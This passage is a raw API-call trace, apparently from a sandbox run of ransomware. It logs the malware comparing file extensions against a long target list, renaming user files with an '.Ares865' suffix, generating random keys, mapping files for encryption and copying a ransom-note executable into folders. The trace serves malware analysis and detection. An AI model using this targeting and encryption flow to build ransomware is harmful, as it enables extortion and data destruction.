returned -1 [0059.556] lstrlenW (lpString="rod") returned 3 [0059.556] lstrcmpiW (lpString1="-ms", lpString2="rod") returned -1 [0059.556] lstrlenW (lpString="rodx") returned 4 [0059.556] lstrcmpiW (lpString1="h-ms", lpString2="rodx") returned -1 [0059.556] lstrlenW (lpString="rpd") returned 3 [0059.556] lstrcmpiW (lpString1="-ms", lpString2="rpd") returned -1 [0059.556] lstrlenW (lpString="rsd") returned 3 [0059.556] lstrcmpiW (lpString1="-ms", lpString2="rsd") returned -1 [0059.556] lstrlenW (lpString="sas7bdat") returned 8 [0059.556] lstrcmpiW (lpString1="earch-ms", lpString2="sas7bdat") returned -1 [0059.556] lstrlenW (lpString="sbf") returned 3 [0059.556] lstrcmpiW (lpString1="-ms", lpString2="sbf") returned -1 [0059.556] lstrlenW (lpString="scx") returned 3 [0059.556] lstrcmpiW (lpString1="-ms", lpString2="scx") returned -1 [0059.556] lstrlenW (lpString="sdb") returned 3 [0059.556] lstrcmpiW (lpString1="-ms", lpString2="sdb") returned -1 [0059.557] lstrlenW (lpString="sdc") returned 3 [0059.557] lstrcmpiW (lpString1="-ms", lpString2="sdc") returned -1 [0059.557] lstrlenW (lpString="sdf") returned 3 [0059.557] lstrcmpiW (lpString1="-ms", lpString2="sdf") returned -1 [0059.557] lstrlenW (lpString="sis") returned 3 [0059.557] lstrcmpiW (lpString1="-ms", lpString2="sis") returned -1 [0059.557] lstrlenW (lpString="spq") returned 3 [0059.557] lstrcmpiW (lpString1="-ms", lpString2="spq") returned -1 [0059.557] lstrlenW (lpString="te") returned 2 [0059.557] lstrcmpiW (lpString1="ms", lpString2="te") returned -1 [0059.557] lstrlenW (lpString="teacher") returned 7 [0059.557] lstrcmpiW (lpString1="arch-ms", lpString2="teacher") returned -1 [0059.557] lstrlenW (lpString="tmd") returned 3 [0059.557] lstrcmpiW (lpString1="-ms", lpString2="tmd") returned -1 [0059.557] lstrlenW (lpString="tps") returned 3 [0059.557] lstrcmpiW (lpString1="-ms", lpString2="tps") returned -1 [0059.557] lstrlenW (lpString="trc") returned 3 [0059.557] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0059.557] lstrlenW (lpString="trc") returned 3 [0059.557] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0059.557] lstrlenW (lpString="trm") returned 3 [0059.557] lstrcmpiW (lpString1="-ms", lpString2="trm") returned -1 [0059.557] lstrlenW (lpString="udb") returned 3 [0059.557] lstrcmpiW (lpString1="-ms", lpString2="udb") returned -1 [0059.557] lstrlenW (lpString="udl") returned 3 [0059.557] lstrcmpiW (lpString1="-ms", lpString2="udl") returned -1 [0059.557] lstrlenW (lpString="usr") returned 3 [0059.557] lstrcmpiW (lpString1="-ms", lpString2="usr") returned -1 [0059.557] lstrlenW (lpString="v12") returned 3 [0059.557] lstrcmpiW (lpString1="-ms", lpString2="v12") returned -1 [0059.557] lstrlenW (lpString="vis") returned 3 [0059.557] lstrcmpiW (lpString1="-ms", lpString2="vis") returned -1 [0059.557] lstrlenW (lpString="vpd") returned 3 [0059.557] lstrcmpiW (lpString1="-ms", lpString2="vpd") returned -1 [0059.557] lstrlenW (lpString="vvv") returned 3 [0059.557] lstrcmpiW (lpString1="-ms", lpString2="vvv") returned -1 [0059.557] lstrlenW (lpString="wdb") returned 3 [0059.557] lstrcmpiW (lpString1="-ms", lpString2="wdb") returned -1 [0059.558] lstrlenW (lpString="wmdb") returned 4 [0059.558] lstrcmpiW (lpString1="h-ms", lpString2="wmdb") returned -1 [0059.558] lstrlenW (lpString="wrk") returned 3 [0059.558] lstrcmpiW (lpString1="-ms", lpString2="wrk") returned -1 [0059.558] lstrlenW (lpString="xdb") returned 3 [0059.558] lstrcmpiW (lpString1="-ms", lpString2="xdb") returned -1 [0059.558] lstrlenW (lpString="xld") returned 3 [0059.558] lstrcmpiW (lpString1="-ms", lpString2="xld") returned -1 [0059.558] lstrlenW (lpString="xmlff") returned 5 [0059.558] lstrcmpiW (lpString1="ch-ms", lpString2="xmlff") returned -1 [0059.558] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Searches\\Indexed Locations.search-ms.Ares865") returned 66 [0059.558] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default user\\searches\\indexed locations.search-ms"), lpNewFileName="C:\\Users\\Default User\\Searches\\Indexed Locations.search-ms.Ares865" (normalized: "c:\\users\\default user\\searches\\indexed locations.search-ms.ares865"), dwFlags=0x1) returned 1 [0059.559] CreateFileW (lpFileName="C:\\Users\\Default User\\Searches\\Indexed Locations.search-ms.Ares865" (normalized: "c:\\users\\default user\\searches\\indexed locations.search-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0059.559] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=248) returned 1 [0059.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0059.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0059.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0738 [0059.559] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0628) returned 1 [0059.560] CryptGenRandom (in: hProv=0x2f0628, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0059.560] CryptReleaseContext (hProv=0x2f0628, dwFlags=0x0) returned 1 [0059.560] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x400, lpName=0x0) returned 0x12c [0059.569] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x400) returned 0x190000 [0059.570] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0628) returned 1 [0059.571] CryptGenRandom (in: hProv=0x2f0628, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0059.571] CryptReleaseContext (hProv=0x2f0628, dwFlags=0x0) returned 1 [0059.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0059.571] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0059.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0059.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0059.571] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0059.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0059.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0059.571] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0059.571] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0059.571] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0059.571] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0059.571] CloseHandle (hObject=0x12c) returned 1 [0059.571] CloseHandle (hObject=0x118) returned 1 [0059.573] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0059.573] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0738 | out: hHeap=0x2b0000) returned 1 [0059.573] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0059.573] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0059.573] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0059.573] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2348 [0059.573] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Saved Games", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Saved Games") returned="C:\\Users\\Default User\\Saved Games" [0059.573] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee920 | out: hHeap=0x2b0000) returned 1 [0059.573] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2340 | out: hHeap=0x2b0000) returned 1 [0059.573] lstrlenW (lpString="C:\\Users\\Default User\\Saved Games") returned 33 [0059.573] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Saved Games" | out: lpString1="C:\\Users\\Default User\\Saved Games") returned="C:\\Users\\Default User\\Saved Games" [0059.573] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.573] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Saved Games\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\saved games\\how to back your files.exe"), bFailIfExists=1) returned 0 [0059.574] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.574] GetLastError () returned 0x20 [0059.574] Sleep (dwMilliseconds=0xc8) [0059.786] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0059.786] GetLastError () returned 0x0 [0059.786] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0059.786] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0059.786] CloseHandle (hObject=0x12c) returned 1 [0059.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0059.790] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.790] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Saved Games\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49e7cb40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49e7cb40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0059.790] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.790] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.790] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.790] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49e7cb40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49e7cb40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.790] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.790] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0059.790] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.790] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.790] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0059.790] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.790] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0059.790] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0059.790] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0059.790] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0059.790] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0059.790] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0059.790] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0059.790] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0059.790] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0059.790] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0059.790] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0059.790] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0059.790] lstrlenW (lpString="desktop.ini") returned 11 [0059.790] lstrlenW (lpString="C:\\Users\\Default User\\Saved Games\\*") returned 35 [0059.791] lstrcpyW (in: lpString1=0x2cce444, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0059.791] lstrlenW (lpString="desktop.ini") returned 11 [0059.791] lstrlenW (lpString="Ares865") returned 7 [0059.791] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0059.791] lstrlenW (lpString=".dll") returned 4 [0059.791] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0059.791] lstrlenW (lpString=".lnk") returned 4 [0059.791] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0059.791] lstrlenW (lpString=".ini") returned 4 [0059.791] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0059.791] lstrlenW (lpString=".sys") returned 4 [0059.791] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0059.791] lstrlenW (lpString="desktop.ini") returned 11 [0059.791] lstrlenW (lpString="bak") returned 3 [0059.791] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0059.791] lstrlenW (lpString="ba_") returned 3 [0059.791] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0059.791] lstrlenW (lpString="dbb") returned 3 [0059.791] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0059.791] lstrlenW (lpString="vmdk") returned 4 [0059.791] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0059.791] lstrlenW (lpString="rar") returned 3 [0059.791] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0059.791] lstrlenW (lpString="zip") returned 3 [0059.798] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0059.798] lstrlenW (lpString="tgz") returned 3 [0059.798] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0059.798] lstrlenW (lpString="vbox") returned 4 [0059.798] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0059.798] lstrlenW (lpString="vdi") returned 3 [0059.798] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0059.798] lstrlenW (lpString="vhd") returned 3 [0059.798] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0059.798] lstrlenW (lpString="vhdx") returned 4 [0059.798] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0059.798] lstrlenW (lpString="avhd") returned 4 [0059.798] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0059.798] lstrlenW (lpString="db") returned 2 [0059.798] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0059.798] lstrlenW (lpString="db2") returned 3 [0059.798] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0059.798] lstrlenW (lpString="db3") returned 3 [0059.798] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0059.798] lstrlenW (lpString="dbf") returned 3 [0059.798] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0059.798] lstrlenW (lpString="mdf") returned 3 [0059.798] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0059.798] lstrlenW (lpString="mdb") returned 3 [0059.798] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0059.798] lstrlenW (lpString="sql") returned 3 [0059.798] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0059.798] lstrlenW (lpString="sqlite") returned 6 [0059.799] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0059.799] lstrlenW (lpString="sqlite3") returned 7 [0059.799] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0059.799] lstrlenW (lpString="sqlitedb") returned 8 [0059.799] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0059.799] lstrlenW (lpString="xml") returned 3 [0059.799] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0059.799] lstrlenW (lpString="$er") returned 3 [0059.799] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0059.799] lstrlenW (lpString="4dd") returned 3 [0059.799] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0059.799] lstrlenW (lpString="4dl") returned 3 [0059.799] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0059.799] lstrlenW (lpString="^^^") returned 3 [0059.799] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0059.799] lstrlenW (lpString="abs") returned 3 [0059.799] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0059.799] lstrlenW (lpString="abx") returned 3 [0059.799] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0059.801] lstrlenW (lpString="accdb") returned 5 [0059.801] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0059.801] lstrlenW (lpString="accdc") returned 5 [0059.801] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0059.801] lstrlenW (lpString="accde") returned 5 [0059.801] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0059.801] lstrlenW (lpString="accdr") returned 5 [0059.801] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0059.801] lstrlenW (lpString="accdt") returned 5 [0059.801] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0059.801] lstrlenW (lpString="accdw") returned 5 [0059.801] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0059.801] lstrlenW (lpString="accft") returned 5 [0059.801] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0059.803] lstrlenW (lpString="adb") returned 3 [0059.803] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0059.803] lstrlenW (lpString="adb") returned 3 [0059.803] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0059.803] lstrlenW (lpString="ade") returned 3 [0059.804] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0059.804] lstrlenW (lpString="adf") returned 3 [0059.804] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0059.804] lstrlenW (lpString="adn") returned 3 [0059.804] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0059.804] lstrlenW (lpString="adp") returned 3 [0059.804] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0059.804] lstrlenW (lpString="alf") returned 3 [0059.804] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0059.804] lstrlenW (lpString="ask") returned 3 [0059.804] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0059.804] lstrlenW (lpString="btr") returned 3 [0059.804] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0059.804] lstrlenW (lpString="cat") returned 3 [0059.804] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0059.804] lstrlenW (lpString="cdb") returned 3 [0059.804] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0059.804] lstrlenW (lpString="ckp") returned 3 [0059.804] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0059.804] lstrlenW (lpString="cma") returned 3 [0059.804] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0059.804] lstrlenW (lpString="cpd") returned 3 [0059.804] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0059.804] lstrlenW (lpString="dacpac") returned 6 [0059.804] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0059.804] lstrlenW (lpString="dad") returned 3 [0059.804] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0059.804] lstrlenW (lpString="dadiagrams") returned 10 [0059.804] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0059.804] lstrlenW (lpString="daschema") returned 8 [0059.804] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0059.804] lstrlenW (lpString="db-journal") returned 10 [0059.804] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0059.804] lstrlenW (lpString="db-shm") returned 6 [0059.804] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0059.804] lstrlenW (lpString="db-wal") returned 6 [0059.805] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0059.806] lstrlenW (lpString="dbc") returned 3 [0059.806] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0059.806] lstrlenW (lpString="dbs") returned 3 [0059.806] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0059.806] lstrlenW (lpString="dbt") returned 3 [0059.806] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0059.806] lstrlenW (lpString="dbv") returned 3 [0059.806] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0059.806] lstrlenW (lpString="dbx") returned 3 [0059.806] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0059.806] lstrlenW (lpString="dcb") returned 3 [0059.806] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0059.806] lstrlenW (lpString="dct") returned 3 [0059.806] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0059.806] lstrlenW (lpString="dcx") returned 3 [0059.806] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0059.806] lstrlenW (lpString="ddl") returned 3 [0059.806] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0059.806] lstrlenW (lpString="dlis") returned 4 [0059.806] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0059.806] lstrlenW (lpString="dp1") returned 3 [0059.806] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0059.806] lstrlenW (lpString="dqy") returned 3 [0059.806] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0059.806] lstrlenW (lpString="dsk") returned 3 [0059.806] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0059.806] lstrlenW (lpString="dsn") returned 3 [0059.806] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0059.806] lstrlenW (lpString="dtsx") returned 4 [0059.806] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0059.806] lstrlenW (lpString="dxl") returned 3 [0059.806] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0059.806] lstrlenW (lpString="eco") returned 3 [0059.806] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0059.806] lstrlenW (lpString="ecx") returned 3 [0059.806] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0059.806] lstrlenW (lpString="edb") returned 3 [0059.807] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0059.807] lstrlenW (lpString="epim") returned 4 [0059.807] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0059.807] lstrlenW (lpString="fcd") returned 3 [0059.807] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0059.807] lstrlenW (lpString="fdb") returned 3 [0059.807] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0059.807] lstrlenW (lpString="fic") returned 3 [0059.807] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0059.807] lstrlenW (lpString="flexolibrary") returned 12 [0059.807] lstrlenW (lpString="fm5") returned 3 [0059.807] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0059.807] lstrlenW (lpString="fmp") returned 3 [0059.807] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0059.807] lstrlenW (lpString="fmp12") returned 5 [0059.807] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0059.807] lstrlenW (lpString="fmpsl") returned 5 [0059.807] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0059.807] lstrlenW (lpString="fol") returned 3 [0059.807] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0059.807] lstrlenW (lpString="fp3") returned 3 [0059.807] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0059.807] lstrlenW (lpString="fp4") returned 3 [0059.807] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0059.807] lstrlenW (lpString="fp5") returned 3 [0059.807] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0059.807] lstrlenW (lpString="fp7") returned 3 [0059.807] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0059.807] lstrlenW (lpString="fpt") returned 3 [0059.807] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0059.807] lstrlenW (lpString="frm") returned 3 [0059.807] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0059.807] lstrlenW (lpString="gdb") returned 3 [0059.807] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0059.807] lstrlenW (lpString="gdb") returned 3 [0059.807] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0059.807] lstrlenW (lpString="grdb") returned 4 [0059.807] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0059.808] lstrlenW (lpString="gwi") returned 3 [0059.808] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0059.808] lstrlenW (lpString="hdb") returned 3 [0059.808] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0059.808] lstrlenW (lpString="his") returned 3 [0059.808] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0059.808] lstrlenW (lpString="ib") returned 2 [0059.808] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0059.808] lstrlenW (lpString="idb") returned 3 [0059.808] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0059.808] lstrlenW (lpString="ihx") returned 3 [0059.808] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0059.808] lstrlenW (lpString="itdb") returned 4 [0059.808] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0059.808] lstrlenW (lpString="itw") returned 3 [0059.808] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0059.808] lstrlenW (lpString="jet") returned 3 [0059.808] lstrcmpiW 